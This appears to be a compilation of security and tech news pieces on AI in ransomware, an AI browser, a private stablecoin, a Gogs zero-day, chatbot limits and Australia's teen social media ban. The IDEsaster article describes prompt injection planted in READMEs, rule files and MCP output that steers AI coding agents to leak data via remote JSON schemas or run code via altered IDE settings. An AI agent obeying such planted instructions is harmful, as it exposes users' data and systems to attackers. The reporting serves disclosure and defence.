Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Neo AI Browser: How Norton’s AI-Driven Browser Aims to Change Everyday Web Use

 


Web browsers are increasingly evolving beyond basic internet access, and artificial intelligence is becoming a central part of that shift. Neo, an AI-powered browser developed by Norton, is designed to combine browsing, productivity tools, and security features within a single platform. The browser positions itself as a solution for users seeking efficiency, privacy control, and reduced online distractions.

Unlike traditional browsers that rely heavily on cloud-based data processing, Neo stores user information directly on the device. This includes browsing history, AI interactions, and saved preferences. By keeping this data local, the browser allows users to decide what information is retained, synchronized, or removed, addressing growing concerns around data exposure and third-party access.

Security is another core component of Neo’s design. The browser integrates threat protection technologies intended to identify and block phishing attempts, malicious websites, and other common online risks. These measures aim to provide a safer browsing environment, particularly for users who frequently navigate unfamiliar or high-risk websites.

Neo’s artificial intelligence features are embedded directly into the browsing experience. Users can highlight text on a webpage to receive simplified explanations or short summaries, which may help when reading technical, lengthy, or complex content. The browser also includes writing assistance tools that offer real-time grammar corrections and clarity suggestions, supporting everyday tasks such as emails, reports, and online forms.

Beyond text-based tools, Neo includes AI-assisted document handling and image-related features. These functions are designed to support content creation and basic processing tasks without requiring additional software. By consolidating these tools within the browser, Neo aims to reduce the need to switch between multiple applications during routine work.

To improve usability, Neo features a built-in ad blocker that limits intrusive advertising. Reducing ads not only minimizes visual distractions but can also improve page loading speeds. This approach aims to provide a smoother and more focused browsing experience for both professional and casual use.

Tab management is another area where Neo applies automation. Open tabs are grouped based on content type, helping users manage multiple webpages more efficiently. The browser also remembers frequently visited sites and ongoing tasks, allowing users to resume activity without manually reorganizing their workspace.

Customization plays a role in Neo’s appeal. Users can adjust the browser’s appearance, create shortcuts, and modify settings to better match their workflow. Neo also supports integration with external applications, enabling notifications and tool access without leaving the browser interface.

Overall, Neo reflects a broader trend toward AI-assisted browsing paired with stronger privacy controls. By combining local data storage, built-in security, productivity-focused AI tools, and performance optimization features, the browser presents an alternative approach to how users interact with the web. Whether it reshapes mainstream browsing habits remains to be seen, but it underlines how AI is steadily redefining everyday digital experiences.



Circle and Aleo Roll Out USDCx With Banking-Level Privacy Features

 

Aleo and Circle are launching USDCx, a new, privacy-centric version of the USDC stablecoin designed to provide "banking-level" confidentiality while maintaining regulatory visibility and dollar backing. The token is launching first on Aleo's testnet and was built using Circle's new xReserve platform, which allows partner blockchains to issue their own USDC-backed assets that interoperate with native USDC liquidity.

New role of USDCx 

USDCx remains pegged one-to-one with the U.S. dollar, but it is issued on Aleo, a layer-1 blockchain architecture around zero-knowledge proofs for private transactions. Rather than broadcasting clear-text transaction details on-chain, Aleo represents transfers as encrypted data blobs that shield sender, receiver, and amounts from public view. 

Circle and Aleo position this as a response to institutional reluctance to use public blockchains, where transaction histories are permanently transparent and can expose sensitive commercial information or trading strategies. By putting stablecoin predictability together with privacy, they hope to make on-chain dollars more palatable to banks, enterprises, and fintech platforms. 

Despite the privacy focus, USDCx is not an absolute anonymity network. Every transaction contains a "compliance record," which can be viewed by Circle if a regulatory or law enforcement agency wants information, but not accessible on the main chain. Aleo executives claim this to be a "banking level of privacy," which is a middle-ground balance for confidentiality with regulatory support rather than utilizing absolute anonymity methods found in other private currencies.

Target use cases and strategy 

Aleo claims strong interest in inbound usage related to payroll processors, infrastructure, and foreign aid projects, and domestic national security-related application requirements for anonymous but traceable flows. Request Finance and Toku, other payroll service providers, and prediction markets are assessing USDCx to support salaries and wages without revealing income information and strategy to a public blockchain. 

USDCx on Aleo is a part of a larger strategy being undertaken by Circle that involves its xReserve infrastructure and an upcoming stablecoin-optimized Layer 1 network named "Arc," which aims to make USDC-compatible assets programmable and interoperate across different chains. Aleo, which had raised capital from investors such as a16z and Coinbase Ventures for developing zero-knowledge solutions, believes a mainnet launch for USDCx will follow the end of the current testnet period.

IDESaster Report: Severe AI Bugs Found in AI Agents Can Lead to Data Theft and Exploit


Using AI agents for data exfiltrating and RCE

A six-month research into AI-based development tools has disclosed over thirty security bugs that allow remote code execution (RCE) and data exfiltration. The findings by IDEsaster research revealed how AI agents deployed in IDEs like Visual Studio Code, Zed, JetBrains products and various commercial assistants can be tricked into leaking sensitive data or launching hacker-controlled code. 

The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub, Windsurf, Copilot, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four assigned CVEs and additional AWS advisories were also included. 

AI assistants exploitation 

The main problem comes from the way AI agents interact with IDE features. Autonomous components that could read, edit, and create files were never intended for these editors. Once-harmless features turned become attack surfaces when AI agents acquired these skills. In their threat model, all AI IDEs essentially disregard the base software. Since these features have been around for years, they consider them to be naturally safe. 

Attack tactic 

However, the same functionalities can be weaponized into RCE primitives and data exfiltration once autonomous AI bots are included. The research reported that this is an IDE-agnostic attack chain. 

It begins with context hacking via prompt-injection. Covert instructions can be deployed in file names, rule files, READMEs, and outputs from malicious MCP servers. When an agent reads the context, the tool can be redirected to run authorized actions that activate malicious behaviours in the core IDE. The last stage exploits built-in features to steal data or run hacker code in AI IDEs sharing core software layers.

Examples

Writing a JSON file that references a remote schema is one example. Sensitive information gathered earlier in the chain is among the parameters inserted by the agent that are leaked when the IDE automatically retrieves that schema. This behavior was seen in Zed, JetBrains IDEs, and Visual Studio Code. The outbound request was not suppressed by developer safeguards like diff previews.  

Another case study uses altered IDE settings to show complete remote code execution. An attacker can make the IDE execute arbitrary code as soon as a relevant file type is opened or created by updating an executable file that is already in the workspace and then changing configuration fields like php.validate.executablePath. Similar exposure is demonstrated by JetBrains utilities via workspace metadata.

According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”


5 Critical Situations Where You Should Never Rely on ChatGPT

  •  

Just a few years after its launch, ChatGPT has evolved into a go-to digital assistant for tasks ranging from quick searches to event planning. While it undeniably offers convenience, treating it as an all-knowing authority can be risky. ChatGPT is a large language model, not an infallible source of truth, and it is prone to misinformation and fabricated responses. Understanding where its usefulness ends is crucial.

Here are five important areas where experts strongly advise turning to real people, not AI chatbots:

  • Medical advice
ChatGPT cannot be trusted with health-related decisions. It is known to provide confident yet inaccurate information, and it may even acknowledge errors only after being corrected. Even healthcare professionals experimenting with AI agree that it can offer only broad, generic insights — not tailored guidance based on individual symptoms.

Despite this, the chatbot can still respond if you ask, "Hey, what's that sharp pain in my side?", instead of urging you to seek urgent medical care. The core issue is that chatbots cannot distinguish fact from fiction. They generate responses by blending massive amounts of data, regardless of accuracy.

ChatGPT is not, and likely never will be, a licensed medical professional. While it may provide references if asked, those sources must be carefully verified. In several cases, people have reported real harm after following chatbot-generated health advice.

  • Therapy
Mental health support is essential, yet often expensive. Even so-called "cheap" online therapy platforms can cost around $65 per session, and insurance coverage remains limited. While it may be tempting to confide in a chatbot, this can be dangerous.

One major concern is ChatGPT’s tendency toward agreement and validation. In therapy, this can be harmful, as it may encourage behaviors or beliefs that are objectively damaging. Effective mental health care requires an external, trained professional who can challenge harmful thought patterns rather than reinforce them.

There is also an ongoing lawsuit alleging that ChatGPT contributed to a teen’s suicide — a claim OpenAI denies. Regardless of the legal outcome, the case highlights the risks of relying on AI for mental health support. Even advocates of AI-assisted therapy admit that its limitations are significant.

  • Advice during emergencies
In emergencies, every second counts. Whether it’s a fire, accident, or medical crisis, turning to ChatGPT for instructions is a gamble. Incorrect advice in such situations can lead to severe injury or death.

Preparation is far more reliable than last-minute AI guidance. Learning basic skills like CPR or the Heimlich maneuver, participating in fire drills, and keeping emergency equipment on hand can save lives. If possible, always call emergency services rather than relying on a chatbot. This is one scenario where AI is least dependable.

  • Password generation
Using ChatGPT to create passwords may seem harmless, but it carries serious security risks. There is a strong possibility that the chatbot could generate identical or predictable passwords for multiple users. Without precise instructions, the suggested passwords may also lack sufficient complexity.

Additionally, chatbots often struggle with basic constraints, such as character counts. More importantly, ChatGPT stores prompts and outputs to improve its systems, raising concerns about sensitive data being reused or exposed.

Instead, experts recommend dedicated password generators offered by trusted password managers or reputable online tools, which are specifically designed with security in mind.
  • Future predictions
If even leading experts struggle to predict the future accurately, it’s unrealistic to expect ChatGPT to do better. Since AI models frequently get present-day facts wrong, their long-term forecasts are even less reliable.

Using ChatGPT to decide which stocks to buy, which team will win, or which career path will be most profitable is unwise. While it can be entertaining to ask speculative questions about humanity centuries from now, such responses should be treated as curiosity-driven thought experiments — not actionable guidance.

ChatGPT can be a helpful tool when used appropriately, but knowing its limitations is essential. For critical decisions involving health, safety, security, or mental well-being, real professionals remain irreplaceable.


700+ Self-hosted Gits Impacted in a Wild Zero-day Exploit


Hackers actively exploit zero-day bug

Threat actors are abusing a zero-day bug in Gogs- a famous self-hosted Git service. The open source project hasn't fixed it yet.

About the attack 

Over 700 incidents have been impacted in these attacks. Wiz researchers described the bug as "accidental" and said the attack happened in July when they were analyzing malware on a compromised system. During the investigation, the experts "identified that the threat actor was leveraging a previously unknown flaw to compromise instances. They “responsibly disclosed this vulnerability to the maintainers."

The team informed Gogs' maintainers about the bug, who are now working on the fix. 

The flaw is known as CVE-2025-8110. It is primarily a bypass of an earlier patched flaw (CVE-2024-55947) that lets authorized users overwrite external repository files. This leads to remote code execution (RCE). 

About Gogs

Gogs is written in Go, it lets users host Git repositories on their cloud infrastructure or servers. It doesn't use GitHub or other third parties. 

Git and Gogs allow symbolic links that work as shortcuts to another file. They can also point to objects outside the repository. The Gogs API also allows file configuration outside the regular Git protocol. 

Patch update 

The previous patch didn't address such symbolic links exploit and this lets threat actors to leverage the flaw and remotely deploy malicious codes. 

While researchers haven't linked the attacks to any particular gang or person, they believe the threat actors are based in Asia.

Other incidents 

Last year, Mandiant found Chinese state-sponsored hackers abusing a critical flaw in F5 through Supershell, and selling the access to impacted UK government agencies, US defense organizations, and others.

Researchers still don't know what threat actors are doing with access to compromised incidents. "In the environments where we have visibility, the malware was removed quickly so we did not see any post-exploitation activity. We don't have visibility into other compromised servers, beyond knowing they're compromised," researchers said.

How to stay safe?

Wiz has advised users to immediately disable open-registration (if not needed) and control internet exposure by shielding self-hosted Git services via VPN. Users should be careful of new repositories with unexpected usage of the PutContents API or random 8-character names. 

For more details, readers can see the full list of indicators published by the researchers.



Meta Begins Removing Under-16 Users Ahead of Australia’s New Social Media Ban

 



Meta has started taking down accounts belonging to Australians under 16 on Instagram, Facebook and Threads, beginning a week before Australia’s new age-restriction law comes into force. The company recently alerted users it believes are between 13 and 15 that their profiles would soon be shut down, and the rollout has now begun.

Current estimates suggest that a large number of accounts will be affected, including roughly hundreds of thousands across Meta’s platforms. Since Threads operates through Instagram credentials, any underage Instagram account will also lose access to Threads.

Australia’s new policy, which becomes fully active on 10 December, prevents anyone under 16 from holding an account on major social media sites. This law is the first of its kind globally. Platforms that fail to take meaningful action can face penalties reaching up to 49.5 million Australian dollars. The responsibility to monitor and enforce this age limit rests with the companies, not parents or children.

A Meta spokesperson explained that following the new rules will require ongoing adjustments, as compliance involves several layers of technology and review. The company has argued that the government should shift age verification to app stores, where users could verify their age once when downloading an app. Meta claims this would reduce the need for children to repeatedly confirm their age across multiple platforms and may better protect privacy.

Before their accounts are removed, underage users can download and store their photos, videos and messages. Those who believe Meta has made an incorrect assessment can request a review and prove their age by submitting government identification or a short video-based verification.

The new law affects a wide list of services, including Facebook, Instagram, Snapchat, TikTok, Threads, YouTube, X, Reddit, Twitch and Kick. However, platforms designed for younger audiences or tools used primarily for education, such as YouTube Kids, Google Classroom and messaging apps like WhatsApp, are not included. Authorities have also been examining whether children are shifting to lesser-known apps, and companies behind emerging platforms like Lemon8 and Yope have already begun evaluating whether they fall under the new rules.

Government officials have stated that the goal is to reduce children’s exposure to harmful online material, which includes violent content, misogynistic messages, eating disorder promotion, suicide-related material and grooming attempts. A national study reported that the vast majority of children aged 10 to 15 use social media, with many encountering unsafe or damaging content.

Critics, however, warn that age verification tools may misidentify users, create privacy risks or fail to stop determined teenagers from using alternative accounts. Others argue that removing teens from regulated platforms might push them toward unmonitored apps, reducing online safety rather than improving it.

Australian authorities expect challenges in the early weeks of implementation but maintain that the long-term goal is to reduce risks for the youngest generation of online users.